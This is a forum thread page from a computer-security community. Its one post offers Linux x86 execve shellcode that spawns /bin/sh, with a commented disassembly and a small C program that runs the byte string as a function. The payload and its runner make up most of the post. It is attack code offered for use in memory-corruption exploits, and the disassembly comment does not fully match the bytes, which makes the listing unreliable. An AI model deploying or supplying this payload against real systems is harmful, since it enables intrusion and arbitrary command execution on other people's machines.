linux shellcode - HeapOverflow Computer Security Community & Forums : Heap Overflow.com

HeapOverflow Computer Security Community & Forums : Heap Overflow.com

		HeapOverflow Computer Security Community & Forums : Heap Overflow.com > Computer Security: Discussions > Programming
linux shellcode

Mark Forums Read

Notices

Welcome to you visitor! This community is mainly dedicated to the computer and security, if you're looking for DFind scanner or others exploits codes you will find them into the Projects section, feel free to start Blogging and remember to always keep an eye and start talking about security Advisories & public Exploits.

Programming Discuss about the various programming languages (HTLM/PHP/ASP/C#/C++/Java etc..)

linux shellcode

This is a discussion on "linux shellcode" within the Programming part of the Computer Security: Discussions section; Here's some shellcode ,have a look at the assembly. Code: /* linux/x86 execve()51bytes * fl0w_execve.c * linux/x86 execve shellcode,look down and you'll * see a detailed look of the assembly * author fl0 fl0w * flo_flow_supremacy[at]yahoo[dot]...

Reply

#1 (permalink)

Old

27-12-07

fl0 fl0w is offline

Junior Member

Join Date: Dec 2007

Age: 19

Posts: 17

Thanks: 3

Thanked 11 Times in 8 Posts

Rep Power: 5

fl0 fl0w is on a distinguished road

Default

linux shellcode

Here's some shellcode ,have a look at the assembly.

Code:

/* linux/x86 execve()51bytes
 * fl0w_execve.c
 * linux/x86 execve shellcode,look down and you'll
 * see a detailed look of the assembly
 * author fl0 fl0w 
 * flo_flow_supremacy[at]yahoo[dot]com
/* 08048080 <_start>:
 * 8048080:       eb 1a                   jmp    804809c <gotocall>
 * 08048082 <shellcode>:
 * 8048082:       5e                      pop    %esi
 * 8048083:       31 c0                   xor    %eax,%eax
 * 8048085:       88 46 07                mov    %al,0x7(%esi)
 * 8048088:       8d 1e                   lea    (%esi),%ebx
 * 804808a:       89 5e 08                mov    %ebx,0x8(%esi)
 * 804808d:       89 46 0c                mov    %eax,0xc(%esi)
 * 8048090:       b0 0b                   mov    $0xb,%al
 * 8048092:       89 f3                   mov    %esi,%ebx
 * 8048094:       8d 4e 08                lea    0x8(%esi),%ecx
 * 8048097:       8d 4e 0c                lea    0xc(%esi),%ecx
 * 804809a:       cd 80                   int    $0x80
 * 0804809c <gotocall>:
 * 804809c:       e8 e1 ff ff ff          call   8048082 <shellcode>
 * 80480a1:       2f                      das
 * 80480a2:       62 69 6e                bound  %ebp,0x6e(%ecx)
 * 80480a5:       2f                      das
 * 80480a6:       73 68                   jae    8048110 <gotocall+0x74>
 * 80480a8:       4a                      dec    %edx
 * 80480a9:       41                      inc    %ecx
 * 80480aa:       41                      inc    %ecx
 * 80480ab:       41                      inc    %ecx
 * 80480ac:       41                      inc    %ecx
 * 80480ad:       4b                      dec    %ebx
 * 80480ae:       4b                      dec    %ebx
 * 80480af:       4b                      dec    %ebx
 * 80480b0:       4b                      dec    %ebx
*/
#include<stdio.h>
char shellcode[]="\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d"
                 "\x1e\x89\x5e\x08\x89\x46"
                 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
             "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41"
             "\x4b\x4b\x4b\x4b";
main()
 { void (*routine)();
   (long)routine=&shellcode;
    printf("size of shellcode: %dbytes\n",sizeof(shellcode));
    routine();
   }

Btw who is most experienced in stack overflows ?I'm having some problems ,hoping I can get someone to help me.

Last edited by fl0 fl0w; 27-12-07 at 17:59.

Reply With Quote

The Following User Says Thank You to fl0 fl0w For This Useful Post:
class101 (27-12-07)

Sponsor

Advertiser

Reply

Tags
linux, shellcode

« some functions[C/C++] | virus »

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Posting Rules
You may not post new threads You may not post replies You may not post attachments You may not edit your posts BB code is On Smilies are On [IMG] code is On HTML code is Off Trackbacks are On Pingbacks are On Refbacks are On

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
VNC_bypauth: linux & windows scanner	class101	0day	94	04-10-08 03:40
CVE-2007-6284 (fedora, Mandrake Linux, Mandrake Corporate Server, Debian Linux)	Heap	Advisories	0	14-01-08 17:51
CVE-2006-7226 (Desktop, Enterprise Linux AS, Enterprise Linux ES, Enterprise Linux WS	Heap	Advisories	0	06-12-07 17:36
DFind for Linux?	Soulwinter	DFind	8	11-01-06 21:27
Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3	Narcotic	Public	0	08-01-06 22:04

heapoverflow.com - SEOmeter SEO tools

Locations of visitors to this page

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72